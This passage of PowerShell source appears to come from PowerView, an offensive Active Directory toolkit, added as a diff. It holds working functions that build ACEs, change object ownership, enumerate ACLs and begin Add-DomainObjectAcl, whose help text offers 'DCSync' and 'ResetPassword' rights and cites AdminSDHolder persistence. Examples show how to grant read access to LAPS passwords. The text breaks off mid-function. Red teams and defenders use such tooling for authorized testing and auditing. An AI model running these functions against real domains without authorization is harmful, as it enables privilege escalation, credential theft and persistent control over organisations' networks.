?{$_.value -eq 'ms-Mcs-AdmPwd'} | select -ExpandProperty name +$CompPropertyGuid = $Guids.GetEnumerator() | ?{$_.value -eq 'Computer'} | select -ExpandProperty name +$ACE = New-ADObjectAccessControlEntry -Verbose -PrincipalIdentity itadmin -Right ExtendedRight,ReadProperty -AccessControlType Allow -ObjectType $AdmPropertyGuid -InheritanceType All -InheritedObjectType $CompPropertyGuid +$OU = Get-DomainOU -Raw Workstations +$DsEntry = $OU.GetDirectoryEntry() +$dsEntry.PsBase.Options.SecurityMasks = 'Dacl' +$dsEntry.PsBase.ObjectSecurity.AddAccessRule($ACE) +$dsEntry.PsBase.CommitChanges() + +Adds an ACE to all computer objects in the OU "Workstations" permitting the +user "itadmin" to read the confidential ms-Mcs-AdmPwd computer property. + +.OUTPUTS + +System.Security.AccessControl.AuthorizationRule +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('System.Security.AccessControl.AuthorizationRule')] + [CmdletBinding()] + Param ( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True, Mandatory = $True)] + [Alias('DistinguishedName', 'SamAccountName', 'Name')] + [String] + $PrincipalIdentity, + + [ValidateNotNullOrEmpty()] + [String] + $PrincipalDomain, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [Switch] + $Tombstone, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty, + + [Parameter(Mandatory = $True)] + [ValidateSet('AccessSystemSecurity', 'CreateChild','Delete','DeleteChild','DeleteTree','ExtendedRight','GenericAll','GenericExecute','GenericRead','GenericWrite','ListChildren','ListObject','ReadControl','ReadProperty','Self','Synchronize','WriteDacl','WriteOwner','WriteProperty')] + $Right, + + [Parameter(Mandatory = $True, ParameterSetName='AccessRuleType')] + [ValidateSet('Allow', 'Deny')] + [String[]] + $AccessControlType, + + [Parameter(Mandatory = $True, ParameterSetName='AuditRuleType')] + [ValidateSet('Success', 'Failure')] + [String] + $AuditFlag, + + [Parameter(Mandatory = $False, ParameterSetName='AccessRuleType')] + [Parameter(Mandatory = $False, ParameterSetName='AuditRuleType')] + [Parameter(Mandatory = $False, ParameterSetName='ObjectGuidLookup')] + [Guid] + $ObjectType, + + [ValidateSet('All', 'Children','Descendents','None','SelfAndChildren')] + [String] + $InheritanceType, + + [Guid] + $InheritedObjectType + ) + + Begin { + if ($PrincipalIdentity -notmatch '^S-1-.*') { + $PrincipalSearcherArguments = @{ + 'Identity' = $PrincipalIdentity + 'Properties' = 'distinguishedname,objectsid' + } + if ($PSBoundParameters['PrincipalDomain']) { $PrincipalSearcherArguments['Domain'] = $PrincipalDomain } + if ($PSBoundParameters['Server']) { $PrincipalSearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $PrincipalSearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $PrincipalSearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $PrincipalSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $PrincipalSearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $PrincipalSearcherArguments['Credential'] = $Credential } + $Principal = Get-DomainObject @PrincipalSearcherArguments + if (-not $Principal) { + throw "Unable to resolve principal: $PrincipalIdentity" + } + elseif($Principal.Count -gt 1) { + throw "PrincipalIdentity matches multiple AD objects, but only one is allowed" + } + $ObjectSid = $Principal.objectsid + } + else { + $ObjectSid = $PrincipalIdentity + } + + $ADRight = 0 + foreach($r in $Right) { + $ADRight = $ADRight -bor (([System.DirectoryServices.ActiveDirectoryRights]$r).value__) + } + $ADRight = [System.DirectoryServices.ActiveDirectoryRights]$ADRight + + $Identity = [System.Security.Principal.IdentityReference] ([System.Security.Principal.SecurityIdentifier]$ObjectSid) + } + + Process { + if($PSCmdlet.ParameterSetName -eq 'AuditRuleType') { + + if($ObjectType -eq $null -and $InheritanceType -eq [String]::Empty -and $InheritedObjectType -eq $null) { + New-Object System.DirectoryServices.ActiveDirectoryAuditRule -ArgumentList $Identity, $ADRight, $AuditFlag + } elseif($ObjectType -eq $null -and $InheritanceType -ne [String]::Empty -and $InheritedObjectType -eq $null) { + New-Object System.DirectoryServices.ActiveDirectoryAuditRule -ArgumentList $Identity, $ADRight, $AuditFlag, ([System.DirectoryServices.ActiveDirectorySecurityInheritance]$InheritanceType) + } elseif($ObjectType -eq $null -and $InheritanceType -ne [String]::Empty -and $InheritedObjectType -ne $null) { + New-Object System.DirectoryServices.ActiveDirectoryAuditRule -ArgumentList $Identity, $ADRight, $AuditFlag, ([System.DirectoryServices.ActiveDirectorySecurityInheritance]$InheritanceType), $InheritedObjectType + } elseif($ObjectType -ne $null -and $InheritanceType -eq [String]::Empty -and $InheritedObjectType -eq $null) { + New-Object System.DirectoryServices.ActiveDirectoryAuditRule -ArgumentList $Identity, $ADRight, $AuditFlag, $ObjectType + } elseif($ObjectType -ne $null -and $InheritanceType -ne [String]::Empty -and $InheritedObjectType -eq $null) { + New-Object System.DirectoryServices.ActiveDirectoryAuditRule -ArgumentList $Identity, $ADRight, $AuditFlag, $ObjectType, $InheritanceType + } elseif($ObjectType -ne $null -and $InheritanceType -ne [String]::Empty -and $InheritedObjectType -ne $null) { + New-Object System.DirectoryServices.ActiveDirectoryAuditRule -ArgumentList $Identity, $ADRight, $AuditFlag, $ObjectType, $InheritanceType, $InheritedObjectType + } + + } + else { + + if($ObjectType -eq $null -and $InheritanceType -eq [String]::Empty -and $InheritedObjectType -eq $null) { + New-Object System.DirectoryServices.ActiveDirectoryAccessRule -ArgumentList $Identity, $ADRight, $AccessControlType + } elseif($ObjectType -eq $null -and $InheritanceType -ne [String]::Empty -and $InheritedObjectType -eq $null) { + New-Object System.DirectoryServices.ActiveDirectoryAccessRule -ArgumentList $Identity, $ADRight, $AccessControlType, ([System.DirectoryServices.ActiveDirectorySecurityInheritance]$InheritanceType) + } elseif($ObjectType -eq $null -and $InheritanceType -ne [String]::Empty -and $InheritedObjectType -ne $null) { + New-Object System.DirectoryServices.ActiveDirectoryAccessRule -ArgumentList $Identity, $ADRight, $AccessControlType, ([System.DirectoryServices.ActiveDirectorySecurityInheritance]$InheritanceType), $InheritedObjectType + } elseif($ObjectType -ne $null -and $InheritanceType -eq [String]::Empty -and $InheritedObjectType -eq $null) { + New-Object System.DirectoryServices.ActiveDirectoryAccessRule -ArgumentList $Identity, $ADRight, $AccessControlType, $ObjectType + } elseif($ObjectType -ne $null -and $InheritanceType -ne [String]::Empty -and $InheritedObjectType -eq $null) { + New-Object System.DirectoryServices.ActiveDirectoryAccessRule -ArgumentList $Identity, $ADRight, $AccessControlType, $ObjectType, $InheritanceType + } elseif($ObjectType -ne $null -and $InheritanceType -ne [String]::Empty -and $InheritedObjectType -ne $null) { + New-Object System.DirectoryServices.ActiveDirectoryAccessRule -ArgumentList $Identity, $ADRight, $AccessControlType, $ObjectType, $InheritanceType, $InheritedObjectType + } + + } + } +} + + +function Set-DomainObjectOwner { +<# +.SYNOPSIS + +Modifies the owner for a specified active directory object. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainObject + +.DESCRIPTION + +Retrieves the Active Directory object specified by -Identity by splatting to +Get-DomainObject, returning the raw searchresult object. Retrieves the raw +directoryentry for the object, and sets the object owner to -OwnerIdentity. + +.PARAMETER Identity + +A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local), +SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201) +of the AD object to set the owner for. + +.PARAMETER OwnerIdentity + +A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local), +SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201) +of the owner to set for -Identity. + +.PARAMETER Domain + +Specifies the domain to use for the query, defaults to the current domain. + +.PARAMETER LDAPFilter + +Specifies an LDAP query string that is used to filter Active Directory objects. + +.PARAMETER SearchBase + +The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.EXAMPLE + +Set-DomainObjectOwner -Identity dfm -OwnerIdentity harmj0y + +Set the owner of 'dfm' in the current domain to 'harmj0y'. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Set-DomainObjectOwner -Identity dfm -OwnerIdentity harmj0y -Credential $Cred + +Set the owner of 'dfm' in the current domain to 'harmj0y' using the alternate credentials. +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('DistinguishedName', 'SamAccountName', 'Name')] + [String] + $Identity, + + [Parameter(Mandatory = $True)] + [ValidateNotNullOrEmpty()] + [Alias('Owner')] + [String] + $OwnerIdentity, + + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [ValidateNotNullOrEmpty()] + [Alias('Filter')] + [String] + $LDAPFilter, + + [ValidateNotNullOrEmpty()] + [Alias('ADSPath')] + [String] + $SearchBase, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [Switch] + $Tombstone, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + BEGIN { + $SearcherArguments = @{} + if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['LDAPFilter']) { $SearcherArguments['LDAPFilter'] = $LDAPFilter } + if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase } + if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } + + $OwnerSid = Get-DomainObject @SearcherArguments -Identity $OwnerIdentity -Properties objectsid | Select-Object -ExpandProperty objectsid + if ($OwnerSid) { + $OwnerIdentityReference = [System.Security.Principal.SecurityIdentifier]$OwnerSid + } + else { + Write-Warning "[Set-DomainObjectOwner] Error parsing owner identity '$OwnerIdentity'" + } + } + + PROCESS { + if ($OwnerIdentityReference) { + $SearcherArguments['Raw'] = $True + $SearcherArguments['Identity'] = $Identity + + # splat the appropriate arguments to Get-DomainObject + $RawObject = Get-DomainObject @SearcherArguments + + ForEach ($Object in $RawObject) { + try { + Write-Verbose "[Set-DomainObjectOwner] Attempting to set the owner for '$Identity' to '$OwnerIdentity'" + $Entry = $RawObject.GetDirectoryEntry() + $Entry.PsBase.Options.SecurityMasks = 'Owner' + $Entry.PsBase.ObjectSecurity.SetOwner($OwnerIdentityReference) + $Entry.PsBase.CommitChanges() + } + catch { + Write-Warning "[Set-DomainObjectOwner] Error setting owner: $_" + } + } + } + } +} + + +function Get-DomainObjectAcl { +<# +.SYNOPSIS + +Returns the ACLs associated with a specific active directory object. By default +the DACL for the object(s) is returned, but the SACL can be returned with -Sacl. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher, Get-DomainGUIDMap + +.PARAMETER Identity + +A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local), +SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201). +Wildcards accepted. + +.PARAMETER Sacl + +Switch. Return the SACL instead of the DACL for the object (default behavior). + +.PARAMETER ResolveGUIDs + +Switch. Resolve GUIDs to their display names. + +.PARAMETER RightsFilter + +A specific set of rights to return ('All', 'ResetPassword', 'WriteMembers'). + +.PARAMETER Domain + +Specifies the domain to use for the query, defaults to the current domain. + +.PARAMETER LDAPFilter + +Specifies an LDAP query string that is used to filter Active Directory objects. + +.PARAMETER SearchBase + +The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.EXAMPLE + +Get-DomainObjectAcl -Identity matt.admin -domain testlab.local -ResolveGUIDs + +Get the ACLs for the matt.admin user in the testlab.local domain and +resolve relevant GUIDs to their display names. + +.EXAMPLE + +Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs + +Enumerate the ACL permissions for all OUs in the domain. + +.EXAMPLE + +Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs -Sacl + +Enumerate the SACLs for all OUs in the domain, resolving GUIDs. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainObjectAcl -Credential $Cred -ResolveGUIDs + +.OUTPUTS + +PowerView.ACL + +Custom PSObject with ACL entries. +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.ACL')] + [CmdletBinding()] + Param ( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('DistinguishedName', 'SamAccountName', 'Name')] + [String[]] + $Identity, + + [Switch] + $Sacl, + + [Switch] + $ResolveGUIDs, + + [String] + [Alias('Rights')] + [ValidateSet('All', 'ResetPassword', 'WriteMembers')] + $RightsFilter, + + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [ValidateNotNullOrEmpty()] + [Alias('Filter')] + [String] + $LDAPFilter, + + [ValidateNotNullOrEmpty()] + [Alias('ADSPath')] + [String] + $SearchBase, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [Switch] + $Tombstone, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + BEGIN { + $SearcherArguments = @{ + 'Properties' = 'samaccountname,ntsecuritydescriptor,distinguishedname,objectsid' + } + + if ($PSBoundParameters['Sacl']) { + $SearcherArguments['SecurityMasks'] = 'Sacl' + } + else { + $SearcherArguments['SecurityMasks'] = 'Dacl' + } + if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase } + if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } + $Searcher = Get-DomainSearcher @SearcherArguments + + $DomainGUIDMapArguments = @{} + if ($PSBoundParameters['Domain']) { $DomainGUIDMapArguments['Domain'] = $Domain } + if ($PSBoundParameters['Server']) { $DomainGUIDMapArguments['Server'] = $Server } + if ($PSBoundParameters['ResultPageSize']) { $DomainGUIDMapArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $DomainGUIDMapArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Credential']) { $DomainGUIDMapArguments['Credential'] = $Credential } + + # get a GUID -> name mapping + if ($PSBoundParameters['ResolveGUIDs']) { + $GUIDs = Get-DomainGUIDMap @DomainGUIDMapArguments + } + } + + PROCESS { + if ($Searcher) { + $IdentityFilter = '' + $Filter = '' + $Identity | Where-Object {$_} | ForEach-Object { + $IdentityInstance = $_.Replace('(', '\28').Replace(')', '\29') + if ($IdentityInstance -match '^S-1-.*') { + $IdentityFilter += "(objectsid=$IdentityInstance)" + } + elseif ($IdentityInstance -match '^(CN|OU|DC)=.*') { + $IdentityFilter += "(distinguishedname=$IdentityInstance)" + if ((-not $PSBoundParameters['Domain']) -and (-not $PSBoundParameters['SearchBase'])) { + # if a -Domain isn't explicitly set, extract the object domain out of the distinguishedname + # and rebuild the domain searcher + $IdentityDomain = $IdentityInstance.SubString($IdentityInstance.IndexOf('DC=')) -replace 'DC=','' -replace ',','.' + Write-Verbose "[Get-DomainObjectAcl] Extracted domain '$IdentityDomain' from '$IdentityInstance'" + $SearcherArguments['Domain'] = $IdentityDomain + $Searcher = Get-DomainSearcher @SearcherArguments + if (-not $Searcher) { + Write-Warning "[Get-DomainObjectAcl] Unable to retrieve domain searcher for '$IdentityDomain'" + } + } + } + elseif ($IdentityInstance -imatch '^[0-9A-F]{8}-([0-9A-F]{4}-){3}[0-9A-F]{12}$') { + $GuidByteString = (([Guid]$IdentityInstance).ToByteArray() | ForEach-Object { '\' + $_.ToString('X2') }) -join '' + $IdentityFilter += "(objectguid=$GuidByteString)" + } + elseif ($IdentityInstance.Contains('.')) { + $IdentityFilter += "(|(samAccountName=$IdentityInstance)(name=$IdentityInstance)(dnshostname=$IdentityInstance))" + } + else { + $IdentityFilter += "(|(samAccountName=$IdentityInstance)(name=$IdentityInstance)(displayname=$IdentityInstance))" + } + } + if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) { + $Filter += "(|$IdentityFilter)" + } + + if ($PSBoundParameters['LDAPFilter']) { + Write-Verbose "[Get-DomainObjectAcl] Using additional LDAP filter: $LDAPFilter" + $Filter += "$LDAPFilter" + } + + if ($Filter) { + $Searcher.filter = "(&$Filter)" + } + Write-Verbose "[Get-DomainObjectAcl] Get-DomainObjectAcl filter string: $($Searcher.filter)" + + $Results = $Searcher.FindAll() + $Results | Where-Object {$_} | ForEach-Object { + $Object = $_.Properties + + if ($Object.objectsid -and $Object.objectsid[0]) { + $ObjectSid = (New-Object System.Security.Principal.SecurityIdentifier($Object.objectsid[0],0)).Value + } + else { + $ObjectSid = $Null + } + + try { + New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $Object['ntsecuritydescriptor'][0], 0 | ForEach-Object { if ($PSBoundParameters['Sacl']) {$_.SystemAcl} else {$_.DiscretionaryAcl} } | ForEach-Object { + if ($PSBoundParameters['RightsFilter']) { + $GuidFilter = Switch ($RightsFilter) { + 'ResetPassword' { '00299570-246d-11d0-a768-00aa006e0529' } + 'WriteMembers' { 'bf9679c0-0de6-11d0-a285-00aa003049e2' } + Default { '00000000-0000-0000-0000-000000000000' } + } + if ($_.ObjectType -eq $GuidFilter) { + $_ | Add-Member NoteProperty 'ObjectDN' $Object.distinguishedname[0] + $_ | Add-Member NoteProperty 'ObjectSID' $ObjectSid + $Continue = $True + } + } + else { + $_ | Add-Member NoteProperty 'ObjectDN' $Object.distinguishedname[0] + $_ | Add-Member NoteProperty 'ObjectSID' $ObjectSid + $Continue = $True + } + + if ($Continue) { + $_ | Add-Member NoteProperty 'ActiveDirectoryRights' ([Enum]::ToObject([System.DirectoryServices.ActiveDirectoryRights], $_.AccessMask)) + if ($GUIDs) { + # if we're resolving GUIDs, map them them to the resolved hash table + $AclProperties = @{} + $_.psobject.properties | ForEach-Object { + if ($_.Name -match 'ObjectType|InheritedObjectType|ObjectAceType|InheritedObjectAceType') { + try { + $AclProperties[$_.Name] = $GUIDs[$_.Value.toString()] + } + catch { + $AclProperties[$_.Name] = $_.Value + } + } + else { + $AclProperties[$_.Name] = $_.Value + } + } + $OutObject = New-Object -TypeName PSObject -Property $AclProperties + $OutObject.PSObject.TypeNames.Insert(0, 'PowerView.ACL') + $OutObject + } + else { + $_.PSObject.TypeNames.Insert(0, 'PowerView.ACL') + $_ + } + } + } + } + catch { + Write-Verbose "[Get-DomainObjectAcl] Error: $_" + } + } + } + } +} + + +function Add-DomainObjectAcl { +<# +.SYNOPSIS + +Adds an ACL for a specific active directory object. + +AdminSDHolder ACL approach from Sean Metcalf (@pyrotek3): https://adsecurity.org/?p=1906 + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainObject + +.DESCRIPTION + +This function modifies the ACL/ACE entries for a given Active Directory +target object specified by -TargetIdentity. Available -Rights are +'All', 'ResetPassword', 'WriteMembers', 'DCSync', or a manual extended +rights GUID can be set with -RightsGUID. These rights are granted on the target +object for the specified -PrincipalIdentity. + +.PARAMETER TargetIdentity + +A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local), +SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201) +for the domain object to modify ACLs for. Required. Wildcards accepted. + +.PARAMETER TargetDomain + +Specifies the domain for the TargetIdentity to use for the modification, defaults to the current domain. + +.PARAMETER TargetLDAPFilter + +Specifies an LDAP query string that is used to filter Active Directory object targets. + +.PARAMETER TargetSearchBase + +The LDAP source to search through for targets, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +.PARAMETER PrincipalIdentity + +A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local), +SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201) +for the domain principal to add for the ACL. Required. Wildcards accepted. + +.PARAMETER PrincipalDomain + +Specifies the domain for the TargetIdentity to use for the principal, defaults to the current domain. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.PARAMETER Rights + +Rights to add for the principal, 'All', 'ResetPassword', 'WriteMembers', 'DCSync'. +Defaults to 'All'. + +.PARAMETER RightsGUID + +Manual GUID representing the right to add to the target. + +.EXAMPLE + +$Harmj0ySid = Get-DomainUser harmj0y | Select-Object -ExpandProperty objectsid +Get-DomainObjectACL dfm.a -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $Harmj0ySid} + +... + +Add-DomainObjectAcl -TargetIdentity dfm.a -PrincipalIdentity harmj0y -Rights ResetPassword -Verbose +VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(samAccountName=harmj0y))) +VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: [Get-DomainObject] Get-DomainObject filter string:(&(|(samAccountName=dfm.a))) +VERBOSE: [Add-DomainObjectAcl] Granting principal CN=harmj0y,CN=Users,DC=testlab,DC=local 'ResetPassword' on CN=dfm (admin),CN=Users,DC=testlab,DC=local +VERBOSE: [Add-DomainObjectAcl] Granting principal CN=harmj0y,CN=Users,DC=testlab,DC=local rights GUID '00299570-246d-11d0-a768-00aa006e0529' on CN=dfm (admin),CN=Users,DC=testlab,DC=local + +Get-DomainObjectACL dfm.a -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $Harmj0ySid } + +AceQualifier : AccessAllowed +ObjectDN : CN=dfm (admin),CN=Users,DC=testlab,DC=local +ActiveDirectoryRights : ExtendedRight +ObjectAceType : User-Force-Change-Password +ObjectSID : S-1-5-21-890171859-3433809279-3366196753-1114 +InheritanceFlags : None +BinaryLength : 56 +AceType : AccessAllowedObject +ObjectAceFlags : ObjectAceTypePresent +IsCallback : False +PropagationFlags : None +SecurityIdentifier : S-1-5-21-890171859-3433809279-3366196753-1108 +AccessMask : 256 +AuditFlags : None +IsInherited : False +AceFlags : None +InheritedObjectAceType : All +OpaqueLength : 0 + +.EXAMPLE + +$Harmj0ySid = Get-DomainUser harmj0y | Select-Object -ExpandProperty objectsid +Get-DomainObjectACL testuser -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $Harmj0ySid} + +[no results returned] + +$SecPassword = ConvertTo-SecureString 'Password123!'-AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Add-DomainObjectAcl -TargetIdentity testuser -PrincipalIdentity harmj0y -Rights ResetPassword -Credential $Cred -Verbose +VERBOSE: [Get-Domain] Using alternate credentials for Get-Domain +VERBOSE: [Get-Domain] Extracted domain 'TESTLAB' from -Credential +VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: [Get-DomainSearcher] Using alternate credentials for LDAP connection +VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(|(samAccountName=harmj0y)(name=harmj0y)))) +VERBOSE: [Get-Domain] Using alternate credentials for Get-Domain +VERBOSE: [Get-Domain] Extracted domain 'TESTLAB' from -Credential +VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: [Get-DomainSearcher] Using alternate credentials for LDAP connection +VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(|(samAccountName=testuser)(name=testuser)))) +VERBOSE: [Add-DomainObjectAcl] Granting principal CN=harmj0y,CN=Users,DC=testlab,DC=local 'ResetPassword' on CN=testuser testuser,CN=Users,DC=testlab,DC=local +VERBOSE: [Add-DomainObjectAcl] Granting principal CN=harmj0y,CN=Users,DC=testlab,DC=local rights GUID '00299570-246d-11d0-a768-00aa006e0529' on CN=testuser,CN=Users,DC=testlab,DC=local + +Get-DomainObjectACL testuser -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $Harmj0ySid } + +AceQualifier : AccessAllowed +ObjectDN : CN=dfm (admin),CN=Users,DC=testlab,DC=local +ActiveDirectoryRights : ExtendedRight +ObjectAceType : User-Force-Change-Password +ObjectSID : S-1-5-21-890171859-3433809279-3366196753-1114 +InheritanceFlags : None +BinaryLength : 56 +AceType : AccessAllowedObject +ObjectAceFlags : ObjectAceTypePresent +IsCallback : False +PropagationFlags : None +SecurityIdentifier : S-1-5-21-890171859-3433809279-3366196753-1108 +AccessMask : 256 +AuditFlags : None +IsInherited : False +AceFlags : None +InheritedObjectAceType : All +OpaqueLength : 0 + +.LINK + +https://adsecurity.org/?p=1906 +https://social.technet.microsoft.com/Forums/windowsserver/en-US/df3bfd33-c070-4a9c-be98-c4da6e591a0a/forum-faq-using-powershell-to-assign-permissions-on-active-directory-objects?forum=winserverpowershell +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [CmdletBinding()] + Param ( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('DistinguishedName', 'SamAccountName', 'Name')] + [String[]] + $TargetIdentity, + + [ValidateNotNullOrEmpty()] + [String] + $TargetDomain, + + [ValidateNotNullOrEmpty()] + [Alias('Filter')] + [String] + 